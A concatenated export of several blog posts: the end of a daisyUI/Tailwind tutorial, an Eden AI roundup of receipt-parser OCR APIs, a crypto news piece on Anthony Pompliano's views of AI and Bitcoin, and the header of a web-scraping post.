daisyUI into your project via a CDN. * * * ## Using daisyUI as a Tailwind plugin vs. with a CDN As you may have noticed earlier, when we installed daisyUI as a Node package, we included it as a plugin. However, with the CDN method, daisyUI is automatically included. This is just one of the key differences between these two installation methods. Let's explore some other differences between using daisyUI as a Tailwind plugin and using a CDN: * **Installation**: When using daisyUI as a plugin, you install it directly into your project and register it as a plugin to your Tailwind CSS configuration file. In contrast, you don't need to install anything locally when using CDN: you rely on the hosted version * **Tree shaking**: If your build process supports tree shaking, using daisyUI as a plugin allows you to include only styles that your application actually use. This is not possible when using a CDN * **Simplicity**: Using a CDN is straightforward. You include a link to the daisyUI CSS file in your HTML, and you’re ready to use its classes and components. In contrast, the plugin approach involves more installation steps for your projects * **Network dependency**: When using CDN, your application relies on an external server to fetch the daisyUI styles. If the CDN is slow or unavailable, it affects your app’s performance. In contrast, with the plugin approach, daisyUI is part of your project, so it works offline once installed * **Customization**: While you can still customize some aspects using utility classes when using CDN, you won’t have the same level of control as with the plugin approach Both methods have their advantages, but using daisyUI as a plugin is more beneficial overall. The most significant advantage is the ability to purge unused styles, which the plugin approach offers but the CDN method doesn't. That's why the documentation recommends using the CDN method only for development to avoid excessively large file sizes in production. * * * ## Key daisyUI features to know As I’ve already emphasized multiple times in this guide, it's clear that daisyUI offers a wide range of customizable prebuilt components. However, the library offers a lot more than that. Let’s look at some of the standout features that you should pay attention to when working with daisyUI. ### Prebuilt components daisyUI offers a variety of ready-made components that are essential to its feature set. These components cover a wide range of categories, from simple action components to complex data display, layout, data input, and mockup components that are essential in everyday use. The documentation is comprehensive enough to give you in-depth knowledge about these components. However, if you want to assess the categories and functionalities of these components, let’s explore some of the component categories and the components they include. #### Actions The action category contains a collection of simple components that facilitate user interactions and trigger specific behaviors. These components include a `button`, `modal`, `dropdown`, `swap`, and `theme controller` components. The structures of these components are simple enough that they can be created by simply adding daisyUI utility classes to element declarations instead of copying them from the documentation. Take the `button` component, for instance. At the base level, it’s styled with just the `btn` utility class. Instead of going back and forth to the documentation, you can simply declare a `button` element and assign the required utility class: ```html <button className="btn">Button</button> ``` To create different variants of the button component, you can assign any of the following utility classes: ```html <button className="btn btn-active">Default</button> <button className="btn btn-active btn-neutral">Neutral</button> <button className="btn btn-active btn-primary">Primary</button> <button className="btn btn-active btn-secondary">Secondary</button> <button className="btn btn-active btn-accent">Accent</button> <button className="btn btn-active btn-ghost">Ghost</button> <button className="btn btn-active btn-link">Link</button> ``` Here’s how each button class looks: ![Examples Of Various Available Daisy Ui Button Classes](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-button-classes.png) Every other component included in the action category follows this simple structure, except for the `modal` component. Due to its slightly more complex functionality, the modal component requires a significant amount of boilerplate code and a small amount of JavaScript: ```html <button className="btn" onClick={()=>document.getElementById('my_modal_1').showModal()}>Hello daisyUI</button> <dialog id="my_modal_1" className="modal"> <div className="modal-box"> <h3 className="font-bold text-lg">Hello!</h3> <p className="py-4">Press ESC key or click the button below to close</p> <div className="modal-action"> <form method="dialog"> {/* if there is a button in form, it will close the modal */} <button className="btn">Close</button> </form> </div> </div> </dialog> ``` Check out how opening and closing the modal looks: ![Opening And Closing A Simple Daisy Ui Modal](https://blog.logrocket.com/wp-content/uploads/2024/06/Opening-closing-modal-daisyUI.gif) You might want to build on the markup provided in the documentation to save yourself the trouble and time. #### Data display The data display category contains a collection of components that present information to users. This category comprises a large portion of daisyUI's components. Most of the components in this category are used to craft data-intensive components which would otherwise be difficult and time-consuming to build from scratch. Some of these components include tables, cards, accordions, countdowns, carousels, and stats. Let’s see examples of each. The `Table` component is used to display tabular data in rows and columns: ![Example Daisy Ui Table Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-table-component.png) The `Card` component acts as a container for displaying summarized content (e.g., product cards, user profiles): ![Example Daisy Ui Card Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-card-component.png) The `Accordion` component is used to show and hide content, but you can only expand one item at a time: ![Example Daisy Ui Accordion Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-accordion-component.gif) The `Countdown` component lets you set a custom countdown with transition effect of the changing numbers: ![Example Daisy Ui Countdown Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-countdown-component.gif) The `Carousel` component lets you easily create a carousel of images in a scrollable area: ![Example Daisy Ui Carousel Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-carousel-component.gif) The `Stat` component is used to display statistical data: ![Example Daisy Ui Stat Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-stat-component.png) For more information about the components in the data display category and others, I recommend checking out [daisyUI's documentation](https://react.daisyui.com/?path=/story/data-display-accordion--default). #### Feedback The feedback category contains a collection of components that provide information about system’s status or the outcome of a user’s action. Some of the feedback components include alerts, loading, skeleton, and tooltips. Let’s see examples of these as well. The `Alert` component is used to alert users about important events: ![Example Daisy Ui Alert Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-alert-component.png) The `Loading` component is used to render an animation to indicate a loading state: ![Example Daisy Ui Loading Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-loading-component.gif) The `Skeleton` component‘s purpose is similar to the `Loading` component, but it shows the loading state of a component like this instead of as a loading circle: ![Example Daisy Ui Skeleton Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-skeleton-component.gif) The `Tooltip` component is used to display information about an element when hovering over it: ![Example Daisy Ui Tooltip Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-tooltip-component.gif) These are but a handful of the prebuilt components that daisyUI offers. [Refer to the documentation](https://react.daisyui.com/?path=/docs/welcome--docs) to explore and learn more about the available components. ### Custom components In the previous section, we discussed how variants help customize elements. While they offer flexibility, they come with preset styles. Luckily, daisyUI offers multiple ways to customize components to match your design system. The most straightforward and intuitive method is using Tailwind utility classes. Let's suppose you want to customize the `button` component from earlier without using any of the preset variations provided by daisyUI, you can customize it using Tailwind utility classes as follows: ```html <button class="btn rounded-full px-16">Two</button> ``` Another way would be to use the `@apply` directive to create your own styling rules. Here’s the same style using the `@apply` directive: ```css .custom-btn { @apply btn rounded-full px-16; } ``` Additionally, you can opt for the [unstyled version of daisyUI and tailor it to your preference](https://daisyui.com/docs/customize/) or design your own theme. ### Colors daisyUI provides a collection of semantic color utility classes that it encourages for usage instead of Tailwind’s color shades. These collections have names with specific meanings that make them more intuitive for designers and developers. Examples of daisyUI semantic color names include: * **Primary**: Your main brand color * **Secondary**: A complementary color * **Accent**: A color used for highlighting * **Success**, **Warning**, **Error**, and **Info**: State-specific colors * **Neutral**: Background, text, and border colors Why should you use daisyUI’s semantic color names? Here are a few reasons: * Traditionally, when designing user interfaces, we don’t randomly choose colors. Instead, we define a specific color palette with meaningful names, such as `primary` and `secondary`. So it makes sense to use descriptive color names provided by daisyUI to simplify our work * Semantic color names make theming easier. You can create multiple themes using just a few lines of CSS variables * Unlike Tailwind, which provides every shade of every color, daisyUI offers a limited set of semantic color names. This keeps your project cleaner and more consistent ### Themes daisyUI’s out-of-the-box theming capability is one of the features I find pretty exciting. Beyond offering the ability to change your app’s color state from light to dark mode, daisyUI also provides the option to properly theme your application using various color themes, which you can use on all your elements with no extra effort: ![Gif Demonstrating Daisy Ui Theming Capabilities With Theme Dashboard Cycling Through Various Preset Themes](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-theming-capabilities.gif) daisyUI takes the phrase “with zero effort” quite literally when it comes to theming. Adding a theme to your application is as simple as adding its name to the `themes` array in the `tailwind.config.js` as follows: ```javascript module.exports = { //... daisyui: { themes: ["light", "dark", "dracula"], }, } ``` You can then activate it by adding a `data-theme` attribute with your preferred theme name to the HTML tag: ```html <html data-theme=dracula"></html> ``` The best part is that you can add multiple themes and use a utility tool like `css theme change` (made by the same creator of daisyUI) to switch themes and save selected themes in local storage. Here are some of daisyUI’s themes: ![Ten Example Prebuilt Daisy Ui Themes](https://blog.logrocket.com/wp-content/uploads/2024/06/Prebuilt-daisyUI-themes.png) Note that I included a screenshot from the docs to give you a visual representation of the themes. [Refer directly to the documentation](https://daisyui.com/docs/themes/) to see the complete list of themes available. ### Layout & typography daisyUI approaches layout and typography features differently. For layouts, it relies on Tailwind's default utility classes, while for typography, it uses the `@tailwindcss/typography` plugin to tackle common challenges faced by developers when designing web interfaces. The most prevalent of these issues is that of unexpected typography behavior, which stems from the removal of the user agent’s default styles or resets. It's generally advised to reset or remove these styles before starting UI development to avoid future problems. Tailwind does this by default, and as a result, stylings applied on content from external sources such as text editors in a CMS or Markdown files tend to appear differently than anticipated. The `@tailwindcss/typography` plugin fixes this issue by providing a set of `prose` classes that enhance typography for content you don’t directly control. You can apply these `prose` classes to your HTML content and add beautiful typography defaults, ensuring consistent styling even for content you didn’t create directly: ```html <article class="prose"> <!-- Your content here --> </article> ``` Additionally, daisyUI adds some styles to `@tailwindcss/typography` so it can tailor the typography to the current theme. This way, your typography can stay consistent across boards: ![Example Daisy Ui Typography Styles — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-typography.png) To use `@tailwindcss/typography` in your project, require it in your `tailwind.config.js` file like so: ```javascript module.exports = { //... plugins: [require("@tailwindcss/typography"), require("daisyui")], }; ``` * * * ## Use cases for daisyUI Given daisyUI’s framework-agnostic nature, it can be used for a wide range of practical and business purposes. Here is a list of some of the use cases for daisyUI: * **Ecommerce platforms**: daisyUI’s prebuilt components like `Card`, `Button`, and `Form` make it easy to create engaging shopping experiences. They can be easily customized to reflect a unique brand identity, all while ensuring consistent design * **SaaS apps**: daisyUI offers a variety of reusable components for building UIs across different functions. You can deliver features quickly and iterate on design improvements for important interfaces like dashboards, user settings, and data visualization in SaaS platforms * **Content management systems (CMS)**: daisyUI's utility-first approach lets teams prioritize performance even with limited resources, which is crucial when building a CMS. You can focus on core functionality and business logic instead of spending time styling components and compromising efficiency * **Admin panels**: daisyUI can improve your efficiency when building robust and maintainable admin interfaces by providing ready-made components for common admin panel elements like tables, forms, and buttons Keep in mind that this is just an example list. daisyUI offers a seamless DX, attractive design, and high performance for anything from basic websites to complex business applications. #### _Further reading:_ * [Building a Next.js app using Tailwind and Storybook](https://blog.logrocket.com/building-next-js-app-tailwind-storybook/) * [10 best Tailwind CSS component libraries](https://blog.logrocket.com/10-best-tailwind-css-component-libraries/) * [A guide to adding gradients with Tailwind CSS](https://blog.logrocket.com/guide-adding-gradients-tailwind-css/) * [Styling in React: 5 ways to style React apps](https://blog.logrocket.com/styling-react-5-ways-style-react-apps/) * * * ## daisyUI vs. similar There are many UI libraries in the frontend ecosystem, each claiming to be the ultimate solution to common developer pain points. Many of these libraries offer similar advantages to daisyUI, so choosing between them can be a chore. The key is identifying the library that best aligns with your project's specific needs and your development team's skill sets. To help you with that, we've prepared a table comparing daisyUI to some of its leading competitors in the frontend ecosystem: <table> <thead> <tr> <th>Feature</th> <th>daisyUI</th> <th>MUI</th> <th>Bootstrap</th> <th>Shadcn UI</th> <th>Chakra UI</th> </tr> </thead> <tbody> <tr> <td>Supported frameworks</td> <td>Framework-agnostic</td> <td>React</td> <td>Vanilla JS, React, Vue.js</td> <td>Framework-agnostic</td> <td>React</td> </tr> <tr> <td>Community</td> <td>Growing community, good documentation</td> <td>Large, active community</td> <td>Very large community</td> <td>Smaller community</td> <td>Moderate, active community</td> </tr> <tr> <td>Bundle size</td> <td>39.5kB minified</td> <td>93.7kB minified</td> <td>38.7kB minified</td> <td>35.3 kB minified</td> <td>205.9kB minfied</td> </tr> <tr> <td>Prestyled components</td> <td>Yes</td> <td>Yes</td> <td>Yes</td> <td>Yes</td> <td>Yes</td> </tr> <tr> <td>Customization options</td> <td>Extensive, through Tailwind CSS</td> <td>Moderate</td> <td>Moderate</td> <td>Extensive, through Theming</td> <td>Extensive</td> </tr> <tr> <td>Scalability</td> <td>Scales well</td> <td>Scales well</td> <td>Scales well</td> <td>Scales well</td> <td>Scales well</td> </tr> <tr> <td>Learning curve</td> <td>Moderate (if familiar with Tailwind)</td> <td>Steeper</td> <td>Moderate</td> <td>Moderate (if familiar with Tailwind)</td> <td>Moderate</td> </tr> <tr> <td>Theming</td> <td>Extensive theming capabilities and options</td> <td>Extensive theming capabilities</td> <td>Extensive theming capabilities</td> <td>Advanced theming capabilities</td> <td>Extensive theming capabilities</td> </tr> </tbody> </table> You can use this table to quickly compare daisyUI at a glance to other libraries in terms of important aspects such as versatility, bundle size, feature set, and community support. * * * ## Conclusion daisyUI bridges the gap between utility-first styling and component reusability. Due to its seamless integration with Tailwind CSS, it gives developers the flexibility to create efficient, customizable, and visually appealing interfaces. Whether you’re building a simple website, a complex application, or anything in between, daisyUI offers a valuable toolkit for frontend development. --- ##Get set up with LogRocket's modern error tracking in minutes: 1. Visit https://logrocket.com/signup/ to get an app ID. 2. Install LogRocket via NPM or script tag. `LogRocket.init()` must be called client-side, not server-side. NPM: ```bash $ npm i --save logrocket // Code: import LogRocket from 'logrocket'; LogRocket.init('app/id'); ``` Script Tag: ```javascript Add to your HTML: <script src="https://cdn.lr-ingest.com/LogRocket.min.js"></script> <script>window.LogRocket && window.LogRocket.init('app/id');</script> ``` 3.(Optional) Install plugins for deeper integrations with your stack: * Redux middleware * ngrx middleware * Vuex plugin [Get started now](https://lp.logrocket.com/blg/signup)
leemeganj
1,909,033
Top Free OCR Receipt Parser APIs, and Open Source models
What is Receipt Parser API? Receipt Parser is a technology that extracts and digitizes...
0
2024-07-02T14:14:03
https://www.edenai.co/post/top-free-ocr-receipt-parser-apis-and-open-source-models
ai, api, opensource
## What is [Receipt Parser API](https://www.edenai.co/feature/ocr-receipt-parsing-apis?referral=top-free-receipt-parser-apis-and-open-source-models)? [Receipt Parser](https://www.edenai.co/feature/ocr-receipt-parsing-apis?referral=top-free-receipt-parser-apis-and-open-source-models) is a technology that extracts and digitizes meaningful data from scanned or PDF receipts using OCR (Optical Character Recognition). It automates the process of scanning receipts and extracting information, allowing businesses to collect data faster and more efficiently compared to manual data entry. Common fields captured by receipt OCR include item descriptions, quantities, prices, merchant information, dates, and total amounts. ![Receipt Parsing](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uhgkh43hdhllzkxoali2.png) By automating the extraction of data from receipts, companies can streamline their workflows, reduce errors, and gain valuable insights into their spending and purchasing habits.‍ ## Top Open Source (Free) Receipt Parser models on the market For users seeking a cost-effective engine, opting for an open-source model is recommended. Here is the list of the best Receipt Parser Open Source Models: ### [Tesseract OCR‍](https://github.com/tesseract-ocr/tesseract?referral=top-free-receipt-parser-apis-and-open-source-models) Tesseract is a highly versatile open-source OCR engine that can be adapted for receipt data extraction. With the right training and configuration, it can serve as a powerful tool for developers looking to build their own receipt parser solutions. Tesseract includes a neural net (LSTM) based OCR engine, which improves its performance on line recognition. It also supports legacy modes for compatibility and performance tuning. Tesseract’s ability to be trained with additional data makes it highly adaptable for specialized tasks like receipt parsing. ### [Apache Tika‍](https://github.com/apache/tika?referral=top-free-receipt-parser-apis-and-open-source-models) Apache Tika is an open-source content analysis toolkit that can extract text from various document formats. By leveraging its OCR capabilities, developers can extract text from images of receipts and then apply custom parsing logic to structure the data. Tika provides a more straightforward integration for developers who are familiar with Java and content analysis, making it relatively easy to use in projects. Tika’s broad support for different file types and its ability to extract metadata make it versatile, though additional customization might be needed for optimal receipt data extraction. ### [OCR.space Free OC API‍](https://ocr.space/?referral=top-free-receipt-parser-apis-and-open-source-models) OCR.space, although not an open source model, offers a FREE OCR API that provides a straightforward method for parsing images and multi-page PDF documents to get the extracted text results in a JSON format. It supports a rate limit of 500 requests per day per IP address, making it a generous option for developers looking to integrate OCR capabilities without incurring costs. The API provides decent accuracy for general OCR tasks and supports output in JSON format, which is useful for developers. As an API, OCR.space is very easy to integrate into applications, requiring minimal setup and offering a straightforward method for OCR tasks. ‍ ## Cons of Using Open Source AI models Although open-source AI models offer numerous benefits, they also present certain drawbacks and hurdles. Here are some disadvantages of utilizing open-source models:‍ - Not Entirely Cost Free: Despite being valuable resources, open-source models may not always be entirely cost-free. Users often incur expenses for hosting and server usage, particularly when dealing with large or resource-intensive datasets. - Lack of Support: Open-source models may lack official support channels or dedicated customer service teams. When encountering issues or needing assistance, users might have to depend on community forums or volunteers, which may not offer the same reliability as commercial support. - Limited Documentation: Some open-source models may lack comprehensive or well-maintained documentation. This can pose challenges for developers in understanding how to effectively utilize the model, resulting in frustration and wasted time. - Security Concerns: Security vulnerabilities can exist in open-source models, and addressing these issues may take longer compared to commercially supported models. Users may need to actively monitor for security updates and patches. - Scalability and Performance: Open-source models might not be as optimized for performance and scalability as commercial counterparts. Applications requiring high performance or handling numerous requests may necessitate additional time investment in optimization efforts. ‍ ## Why choose Eden AI? Given the potential costs and challenges related to open-source models, one cost-effective solution is to use APIs. Eden AI smoothens the incorporation and implementation of AI technologies with its API, connecting to multiple AI engines. Eden AI presents a broad range of AI APIs on its platform, customized to suit your needs and financial limitations. These technologies include data parsing, language identification, sentiment analysis, logo recognition, question answering, data anonymization, speech recognition, and numerous other capabilities. To get started, we offer free credit for you to explore our APIs. ![Eden AI APP](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oi7gpm6rhsfhl6ym63tg.png) **_[T‍ry Eden AI for FREE](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)_** ## Access Receipt Parser providers with one API Our standardized API enables you to integrate Receipt Parser APIs into your system with ease by utilizing various providers on Eden AI. Here is the list (in alphabetical order): ### [Affinda](https://www.affinda.com/?referral=top-free-receipt-parser-apis-and-open-source-models) — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Affinda Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g960enynepp0qullbrul.png) ‍Affinda’s Receipt Parser API employs cutting-edge optical character recognition (OCR) and machine learning algorithms to automate the extraction of key data from receipts. By accurately capturing details like merchant information, transaction amounts, dates, and itemized purchases, the API enables businesses to streamline expense tracking, accounting processes, and gain valuable insights from receipt data. Affinda’s solution is designed for seamless integration into various applications, providing an efficient and user-friendly interface for managing receipt data extraction and analysis. ### AWS — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Amazon Web Services Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q1c43c7t0m6r8jwi2jlg.png) AWS’s Receipt Parsing API leverages advanced machine learning to intelligently parse and extract data from a wide variety of receipt formats. Designed to handle large volumes of receipt data, the API is suitable for both small-scale applications and enterprise-level systems. AWS ensures high availability, reliable access, and automatic scaling to accommodate fluctuating workloads. Additionally, AWS provides a secure environment for processing sensitive receipt data, giving businesses peace of mind. Base64 — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Base64 Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qlwnfek14xt82258lrnc.png) ‍Base64’s Receipt Parser API utilizes state-of-the-art machine learning algorithms to automate the extraction of data from paper receipts, digital receipts, and receipts with complex formatting. The API’s user-friendly design allows for seamless integration into existing workflows, helping businesses save valuable time and reduce errors associated with manual data entry. ### Dataleon — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Dataleon logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lasc17ln7rcnwx96bzdn.png) Dataleon’s Receipt Parser API delivers a high level of accuracy and real-time receipt management for data extraction. The API’s intuitive interface enables businesses to extract data from a diverse range of receipt formats, including handwritten receipts. Dataleon’s solution offers a customizable approach, allowing businesses to select the specific fields they want to extract, making it a versatile option for various industries. ### Google Cloud — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Google Cloud Logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9y6t560grum1w0kpyfk5.png) ‍Google Cloud’s Receipt Parser API leverages machine learning to extract data from receipts with unparalleled accuracy, even handling handwritten receipts. The API’s customizable solutions enable businesses to extract specific data fields tailored to their needs. Google Cloud’s powerful image recognition technology ensures accurate data extraction, even from poorly scanned or low-quality receipts. ### Klippa — [Available on Eden AI‍](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Klippa logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9lnnlrnc64larz6ganlz.png) Klippa’s Receipt Parser API automates numerous receipt-related business processes using advanced machine learning. It offers features such as format conversion, scan quality improvement, and the ability to convert receipt images into structured text and JSON formats using OCR. Klippa’s solution also provides receipt and line item classification, streamlining data analysis, storage, and archiving. Additionally, it offers cross-validation of receipt data, ensuring accuracy and reliability. ### Microsoft Azure — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Microsoft Azure logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s241yjnziadz8g4xh1p4.png) ‍Azure’s Receipt Parsing API, powered by the Form Recognizer receipt model, combines OCR and deep learning to intelligently analyze and extract information from a wide range of receipt formats and qualities, including printed and handwritten receipts. The API accurately captures key details like merchant name, phone number, transaction date, tax, and total, returning the data in structured JSON format for seamless integration into existing systems and workflows. ### Mindee — [Available on Eden AI‍](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Mindee logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x00on9jygr631t166b3x.png) Mindee’s Receipt Parser API represents the pinnacle of computer vision and natural language processing (NLP) technologies, delivering unparalleled accuracy and efficiency in extracting data from receipts. Mindee prioritizes user experience, offering interactive UI components that transform documents into intuitive interfaces, maximizing customer satisfaction and ensuring a smooth data extraction process. Mindee’s API is production-ready, enabling optimized web and mobile rendering features to be quickly integrated into any application. The API’s lightning-fast inference pipeline enables real-time data extraction with ease. ### TabScanner — [Available on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![TabScanner logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/in20vj3hbp7x3el9dmrw.png) ‍TabScanner’s Receipt Parser offers intelligent data capture powered by an AI that understands receipt fields at human levels of intelligence. The Lightning-Fast Cloud API processes all data fields from a POS receipt in under 2 seconds, delivering highly accurate results with an impressive 98% accuracy on core data. TabScanner’s technology can extract line item data from any POS receipt worldwide, regardless of language or character set. The feature set includes regional parameters, ongoing machine learning for data refinement, format configurations, and flexible subscription options for high-volume users. ### Veryfi — [Available on Eden AI‍](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models) ![Veryfi logo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ze1dtp4xw04meotc21xa.png) Veryfi’s API represents the pinnacle of machine learning technology, employing state-of-the-art models to accurately recognize and extract information from receipts, significantly reducing the need for manual data entry. The highly customizable solution can be tailored to fit the specific needs of individual businesses, allowing for seamless integration into existing workflows and optimization to meet unique requirements. Veryfi’s API is designed for scalability, reliability, and user-friendliness, making it a top choice for businesses looking to streamline their receipt processing workflows.‍ ## Pricing Structure for Receipt Parser APIs Eden AI offers a user-friendly platform for evaluating pricing information from diverse API providers and monitoring price changes over time. As a result, keeping up-to-date with the latest pricing is crucial. The pricing chart below outlines the rates for smaller quantities for December 2023, as well as you can get discounts for potentially large volumes.‍ ![Receipt Parser Prices on Eden AI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3qhto9116559yf1zjgs4.png) _**[C‍heck the current prices on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)**_ ## How can Eden AI help you? Eden AI is the future of AI usage in companies: our app allows you to call multiple AI APIs. ![Multiple AI Engines in one API Key - Eden AI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/15cmerxl7qd6ktfsj31a.gif) - Centralized and fully monitored billing on Eden AI for Receipt Parser APIs - Unified API for all providers: simple and standard to use, quick switch between providers, access to the specific features of each provider - Standardized response format: the JSON output format is the same for all suppliers thanks to Eden AI’s standardization work. The response elements are also standardized thanks to Eden AI’s powerful matching algorithms. - The best Artificial Intelligence APIs in the market are available: big cloud providers (Google, AWS, Microsoft, and more specialized engines) - Data protection: Eden AI will not store or use any data. Possibility to filter to use only GDPR engines.‍ You can see Eden AI documentation [here](https://docs.edenai.co/docs/ocr-document-parsing?referral=top-free-receipt-parser-apis-and-open-source-models). ## Next step in your project The Eden AI team can help you with your Receipt Parser integration project. This can be done by : - Organizing a product demo and a discussion to understand your needs better. You can book a time slot on this link: Contact - By testing the public version of Eden AI for free: however, not all providers are available on this version. Some are only available on the Enterprise version. - By benefiting from the support and advice of a team of experts to find the optimal combination of providers according to the specifics of your needs - Having the possibility to integrate on a third-party platform: we can quickly develop connectors. ‍ **_[Create your Account on Eden AI](https://app.edenai.run/user/register?referral=top-free-receipt-parser-apis-and-open-source-models)_**
edenai
1,909,032
Anthony Pompliano on AI and Bitcoin: Catalysts for Wealth Creation
Artificial intelligence and blockchain have become key players in the transformation of various...
0
2024-07-02T14:13:59
https://36crypto.com/anthony-pompliano-on-ai-and-bitcoin-catalysts-for-wealth-creation/
cryptocurrency, blockchain, ai, news
Artificial intelligence and blockchain have become key players in the transformation of various spheres of life. In particular, the intersection of these two technologies has long been discussed by leading opinion leaders in the crypto industry. Recently, Anthony Pompliano, a well-known investor and founder of Pomp Investments, [said](https://www.youtube.com/watch?v=jVGxHvNS-N0) that he expects the next decade to be marked by the synergy of these two technologies. In his opinion, artificial intelligence will create significant wealth, and bitcoin will play an important role in preserving this new state. **The Role of AI and Bitcoin in Wealth Creation** Pompliano noted that many people used to focus on Bitcoin and the crypto sector in general. Today, the focus has shifted to artificial intelligence, and in his opinion, this is not a bad thing. _“But I think people are kind of missing that these are actually part of the same trend.”_ he said. The investor points out that the world is moving towards an era of automation, when artificial intelligence will create enormous wealth. And when this era becomes a reality, bitcoin's responsibility will be to protect it from AI. _“When you see these technologies coming together, an easy way to see the intersection is what money are these machines going to use?”_ Pompliano stated during the interview. Pompliano believes that as artificial intelligence develops and grows through investment, investors will return to Bitcoin. When this happens, he is convinced that the United States will experience a GDP growth thanks to the productivity of AI. Bitcoin's ability to participate in this potential massive artificial intelligence development could lead to a recovery in the coin's price. In his opinion, the recent drop in bitcoin is the result of investors' decision to invest in artificial intelligence. But Pompliano isn't worried about the current 15% price drop, pointing out that bull markets typically see several price pullbacks of 30% or more. _“A lot of people in public markets say “invest in until May and go away” and as a result, the second and third quarters tend to trade sideways — particularly in halving years”_ he explained. Pompliano believes that a similar situation is observed now, but expects another price rally to take place in the last quarter or early 2025, which is also a historical trend in halving years. **Combination of Artificial Intelligence and Blockchain** The combination of blockchain and artificial intelligence opens up broad prospects for the development of technologies and applications in various industries. One of the key aspects of this intersection is to increase the efficiency of the blockchain network by using machine learning algorithms. AI algorithms can help improve consensus-building processes, provide fast transaction verification, and optimize distributed data processing. In addition, the introduction of artificial intelligence can improve the security of blockchain systems by detecting and preventing fraud and cyberattacks. Analyzing large amounts of data in real time allows detecting unusual or suspicious activity, which contributes to a high level of security and reliability. Equally important is the use of machine learning technologies to manage and analyze large amounts of data in blockchain networks. They allow for efficient processing of transaction and user information, providing a better understanding of demand, predicting user behavior, and improving the operational efficiency of the system as a whole. A number of influential people are optimistic about the intersection of these two technologies. In particular, Vitalik Buterin, co-founder of Ethereum, wrote a thorough [article](https://vitalik.eth.limo/general/2024/01/30/cryptoai.html) on the prospects and problems of using AI and cryptocurrencies. In it, he highlighted the points of intersection between blockchain and artificial intelligence technologies: data management, transparency, monetization, and cost reduction. He also categorized AI into several types in the context of decentralized technologies and added all the pros and cons of each of these areas. In addition, the expert [spoke](https://x.com/VitalikButerin/status/1759369749887332577) about the successful experience of integrating AI into Ethereum to detect and fix code errors in the network. _“Now that both blockchains and AIs are becoming more powerful, there is a growing number of use cases in the intersection of the two areas. However, some of these use cases make much more sense and are much more robust than others. I look forward to seeing more attempts at constructive use cases of AI in all of these areas, so we can see which of them are truly viable at scale.”_ he wrote. Volodymyr Nosov, CEO of WhiteBIT, is also positive about the integration of artificial intelligence, noting that AI is a must-have for the crypto industry. In addition, according to Nosov, artificial intelligence has already shown itself at WhiteBIT in design, writing, translation, and text adaptation. He emphasizes the potential of the AI and suggests that one day it will be able to help ease the months-long onboarding of developers. Marcello Mari, founder of SingularityDAO, a decentralized portfolio management protocol, also [emphasized](https://aibc.world/news/marcello-mari-highlights-convergence-of-ai-blockchain/) the transformative impact of artificial intelligence and blockchain. He said that AI enhances blockchain technology by optimizing computing resources and improving data privacy through innovative methods such as homomorphic encryption. On the other hand, blockchain makes it easier to receive fair compensation for content created with artificial intelligence and ensures the security of transactions through distributed ledger technology, mitigating issues such as copyright infringement. _“Any company in the world will eventually use artificial intelligence and will have to use artificial intelligence and is already using artificial intelligence,”_ he [remarked](https://aibc.world/news/marcello-mari-highlights-convergence-of-ai-blockchain/). **Summary** Anthony Pompliano emphasizes that artificial intelligence has the potential to create significant wealth, and bitcoin can provide protection for this future wealth. In his opinion, the combination of these technologies will bring great benefits, in particular, in increasing the productivity and efficiency of systems. The combined use of artificial intelligence and blockchain can improve security, optimize data processing, and provide fast transaction verification.
hryniv_vlad
1,909,031
Unearthing Efficiency: My Experience Bug Hunting with SAW
Scrape Any Website (SAW) promises to be a powerful tool for web data extraction. But as with any...
0
2024-07-02T14:13:56
https://dev.to/marg4cf3553b4099/unearthing-efficiency-my-experience-bug-hunting-with-saw-4h37
